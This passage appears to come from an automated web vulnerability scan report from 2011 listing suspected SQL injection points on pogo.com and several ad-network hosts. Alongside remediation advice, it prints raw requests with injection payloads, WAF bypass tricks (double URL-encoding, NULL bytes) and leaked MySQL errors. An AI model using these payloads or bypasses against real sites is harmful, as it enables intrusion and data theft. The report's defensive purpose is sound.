25.32. http://www1.peanutlabs.com/wp-content/themes/showtime/scripts/timthumb.php
26. Content type is not specified
26.1. http://ads.bluelithium.com/st
26.2. http://adserving.cpxinteractive.com/st
26.3. http://board-games.pogo.com/favicon.ico
26.4. http://card-games.pogo.com/favicon.ico
26.5. http://click.linksynergy.com/fs-bin/stat
26.6. http://game3.pogo.com/favicon.ico
26.7. http://r.turn.com/favicon.ico
26.8. http://www.pogo.com/favicon.ico
26.9. https://www.pogo.com/favicon.ico
1. SQL injection next
There are 28 instances of this issue:
- http://assets.rubiconproject.com/static/rtb/sync-min.html [REST URL parameter 3]
- http://assets.rubiconproject.com/static/rtb/sync-min.html
/ [REST URL parameter 2] - http://assets.rubiconproject.com/static/rtb/sync-min.html
/ [REST URL parameter 3] - http://clubpogo-games.pogo.com/ [name of an arbitrarily supplied request parameter]
- http://game3.pogo.com/room/game/game.jsp [ahst parameter]
- http://game3.pogo.com/room/game/game.jsp [apid parameter]
- http://game3.pogo.com/room/game/game.jsp [rkey parameter]
- http://game3.pogo.com/room/game/game.jsp [s_sess cookie]
- http://link.mavnt.com/1x1.php [51270 parameter]
- http://link.mavnt.com/1x1.php [name of an arbitrarily supplied request parameter]
- http://link.mavnt.com/1x1_map.php [51270 parameter]
- http://link.mavnt.com/1x1_map.php [name of an arbitrarily supplied request parameter]
- http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js [ses15 cookie]
- http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js [rsid cookie]
- http://www.pixeltrack66.com/mt/03745344/&subid1
=MQExit&subid2=CD99 &subid3=409&web_id =e99MQExit&orig=CD99&s =MQExit&c=409 [mt_clk cookie] - http://www.pixeltrack66.com/mt/03745344/&subid1
=MQExit&subid2=CD99 &subid3=409&web_id =e99MQExitPop&orig=CD99&s =MQExit&c=409 [mt_clk cookie] - http://www.pixeltrack66.com/mt/x2a40344g4q2/&subid1
=MQThankYou&subid2=CD99 &subid3=409&subid4= [mt_clk cookie] - http://www.pogo.com/ [com.pogo.ga cookie]
- http://www.pogo.com/action/pogop/welcome.do [com.pogo.info cookie]
- http://www.pogo.com/home/home.jsp [com.pogo.info cookie]
- http://www.pogo.com/home/home.jsp [com.pogo.unid cookie]
- http://www.pogo.com/hotdeploy/us/promotions
/marketing/pogoiphone /landing-page.jsp [s_cc cookie] - http://www.pogo.com/img/prize/en_US/cash
-giveaway [name of an arbitrarily supplied request parameter] - http://www.pogo.com/prize/prize.do [com.pogo.hp.ls.cfg cookie]
- http://www.pogo.com/prize/prize.do [op600clubpogoliid cookie]
- http://www1.peanutlabs.com/peanut-labs-acquired-by
-online-research-company -e-rewards-2/ [PHPSESSID cookie] - http://www1.peanutlabs.com/wp-content/plugins
/contact-form-7/scripts .js [REST URL parameter 3] - http://www1.peanutlabs.com/xmlrpc.php [User-Agent HTTP header]
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
- One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
- Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
1.1. http://assets.rubiconproject.com/static/rtb/sync-min.html [REST URL parameter 3] next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://assets.rubico |
Path: | /static/rtb/sync-min.html |
Issue detail
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /static/rtb/sync-min.html'%20and%201%3d1--%20 HTTP/1.1 Host: assets.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ruid=154d290e46adc1d |
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 234 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 09 Jan 2011 02:02:09 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb/sync-min.html ...[SNIP]... </p> </body></html> |
Request 2
GET /static/rtb/sync-min.html'%20and%201%3d2--%20 HTTP/1.1 Host: assets.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ruid=154d290e46adc1d |
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 325 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 09 Jan 2011 02:02:09 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb/sync-min.html ...[SNIP]... </p> <hr> <address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address> </body></html> |
1.2. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://assets.rubico |
Path: | /static/rtb/sync-min.html |
Issue detail
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /static/rtb'%20and%201%3d1--%20/sync-min.html/ HTTP/1.1 Host: assets.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rdk15=0; ruid=154d290e46adc1d |
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 235 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 09 Jan 2011 02:03:54 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb' and 1=1-- /sync-min.html/ was not found ...[SNIP]... </p> </body></html> |
Request 2
GET /static/rtb'%20and%201%3d2--%20/sync-min.html/ HTTP/1.1 Host: assets.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rdk15=0; ruid=154d290e46adc1d |
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 326 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 09 Jan 2011 02:03:54 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb' and 1=2-- /sync-min.html/ was not found ...[SNIP]... </p> <hr> <address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address> </body></html> |
1.3. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://assets.rubico |
Path: | /static/rtb/sync-min.html |
Issue detail
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 21123539'%20or%201%3d1--Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /static/rtb/sync-min.html21123539'%20or%201%3d1-- Host: assets.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rdk15=0; ruid=154d290e46adc1d |
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 242 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 09 Jan 2011 02:03:55 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb/sync-min ...[SNIP]... </p> </body></html> |
Request 2
GET /static/rtb/sync-min.html21123539'%20or%201%3d2-- Host: assets.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rdk15=0; ruid=154d290e46adc1d |
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 333 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 09 Jan 2011 02:03:55 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb/sync-min ...[SNIP]... </p> <hr> <address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address> </body></html> |
1.4. http://clubpogo-games.pogo.com/ [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://clubpogo-games |
Path: | / |
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 17880153%20or%201%3d1--Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /?117880153%20or%201%3d1-- Host: clubpogo-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response 1 (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=65DADE84E70 Content-Language: en-US Set-Cookie: com.pogo.unid=660637 Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:07:22 GMT Server: Apache-Coyote/1.1 Content-Length: 104734 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a class="navlink" href="http://www.pogo.com <li id="tn-downloads"><a class="navlink" href="http://download <li id="tn-iphone"> <a href="/hotdeploy/us </li> </ul> </div> <div id="page-wrapper" class="clearfix"> <div id="stepSize" style="display:none;">20< <div id="totalItems" style="display:none;">44< <div id="removeFavoritesL <div id="addFavoritesLoca <div id="catBelt"> <ul id="catList" class="items10"> <li id="allgames" > <a href="http://www.pogo.com All Games </a> </li> <li id="puzzle" > <a href="http://puzzle-games Puzzle<br/>Games </a> </li> <li id="board" > ...[SNIP]... |
Request 2
GET /?117880153%20or%201%3d2-- Host: clubpogo-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response 2 (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=1CE604B86F6 Content-Language: en-US Set-Cookie: com.pogo.unid=660640 Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:07:22 GMT Server: Apache-Coyote/1.1 Content-Length: 104744 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a class="navlink" href="http://www.pogo.com <li id="tn-downloads"><a class="navlink" href="http://download <li id="tn-iphone"> <a href="/hotdeploy/us </li> </ul> </div> <div id="page-wrapper" class="clearfix"> <div id="stepSize" style="display:none;">20< <div id="totalItems" style="display:none;">44< <div id="removeFavoritesL <div id="addFavoritesLoca <div id="catBelt"> <ul id="catList" class="items10"> <li id="allgames" > <a href="http://www.pogo.com All Games </a> </li> <li id="puzzle" > <a href="http://puzzle-games Puzzle<br/>Games </a> </li> <li id="board" ...[SNIP]... |
1.5. http://game3.pogo.com/room/game/game.jsp [ahst parameter] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://game3.pogo.com |
Path: | /room/game/game.jsp |
Issue detail
The ahst parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ahst parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ahst request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.Request 1
GET /room/game/game.jsp?site Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response 1 (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:15:33 GMT Server: Apache-Coyote/1.1 Content-Length: 37804 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... s.linkTrackVars=s } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://game3 s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenti ...[SNIP]... |
Request 2
GET /room/game/game.jsp?site Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response 2 (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:15:33 GMT Server: Apache-Coyote/1.1 Content-Length: 37843 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
1.6. http://game3.pogo.com/room/game/game.jsp [apid parameter] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://game3.pogo.com |
Path: | /room/game/game.jsp |
Issue detail
The apid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the apid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.Request 1
GET /room/game/game.jsp?site Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response 1 (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:15:30 GMT Server: Apache-Coyote/1.1 Content-Length: 37803 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... s.linkTrackVars=s } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://game3 s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authenti ...[SNIP]... |
Request 2
GET /room/game/game.jsp?site Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response 2 (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:15:30 GMT Server: Apache-Coyote/1.1 Content-Length: 37849 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
1.7. http://game3.pogo.com/room/game/game.jsp [rkey parameter] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://game3.pogo.com |
Path: | /room/game/game.jsp |
Issue detail
The rkey parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rkey parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.Request 1
GET /room/game/game.jsp?site Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response 1 (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:15:28 GMT Server: Apache-Coyote/1.1 Content-Length: 37785 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... s.linkTrackVars=s } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://game3 s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8="Non Authentic ...[SNIP]... |
Request 2
GET /room/game/game.jsp?site Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response 2 (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:15:28 GMT Server: Apache-Coyote/1.1 Content-Length: 37813 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
1.8. http://game3.pogo.com/room/game/game.jsp [s_sess cookie] previous next
Summary
Severity: | High |
Confidence: | Tentative |
Host: | http://game3.pogo.com |
Path: | /room/game/game.jsp |
Issue detail
The s_sess cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sess cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.Request 1
GET /room/game/game.jsp?site Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response 1 (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:15:42 GMT Server: Apache-Coyote/1.1 Content-Length: 37770 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... s.linkTrackVars=s } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s s.tl(source,'o',pageName) } s.referrer="http://game3 s.eVar2="pogo"; s.pageName="Pogo Unauth generic Log In Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated"; s.prop8 ...[SNIP]... |
Request 2
GET /room/game/game.jsp?site Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response 2 (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: no-cache, no-store Content-Language: en-US Pragma: no-cache Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:15:42 GMT Server: Apache-Coyote/1.1 Content-Length: 38106 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
1.9. http://link.mavnt.com/1x1.php [51270 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://link.mavnt.com |
Path: | /1x1.php |
Issue detail
The 51270 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 51270 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.Request 1
GET /1x1.php?51270' HTTP/1.1 Host: link.mavnt.com Proxy-Connection: keep-alive Referer: http://www.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response 1 (redirected)
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:45 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 682 Content-Type: text/html <br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''51270''' at line 1' in /var/data/adventv2/htdocs Stack trace: #0 ...[SNIP]... |
Request 2
GET /1x1.php?51270'' HTTP/1.1 Host: link.mavnt.com Proxy-Connection: keep-alive Referer: http://www.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response 2 (redirected)
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:48 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 49 Content-Type: image/gif GIF89a................... |
1.10. http://link.mavnt.com/1x1.php [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://link.mavnt.com |
Path: | /1x1.php |
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.Request 1
GET /1x1.php?1'=1 HTTP/1.1 Host: link.mavnt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response 1 (redirected)
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:20 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 675 Connection: close Content-Type: text/html <br /> <b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' in /var/data/adventv2/htdocs Stack trace: #0 /var/d ...[SNIP]... |
Request 2
GET /1x1.php?1''=1 HTTP/1.1 Host: link.mavnt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response 2 (redirected)
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:20 GMT Server: Apache X-Powered-By: PHP/5.2.9 Content-Length: 49 Connection: close Content-Type: image/gif GIF89a................... |
1.11. http://link.mavnt.com/1x1_map.php [51270 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://link.mavnt.com |
Path: | /1x1_map.php |
Issue detail
The 51270 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 51270 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.Request 1
GET /1x1_map.php?51270' HTTP/1.1 Host: link.mavnt.com Proxy-Connection: keep-alive Referer: http://www.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response 1
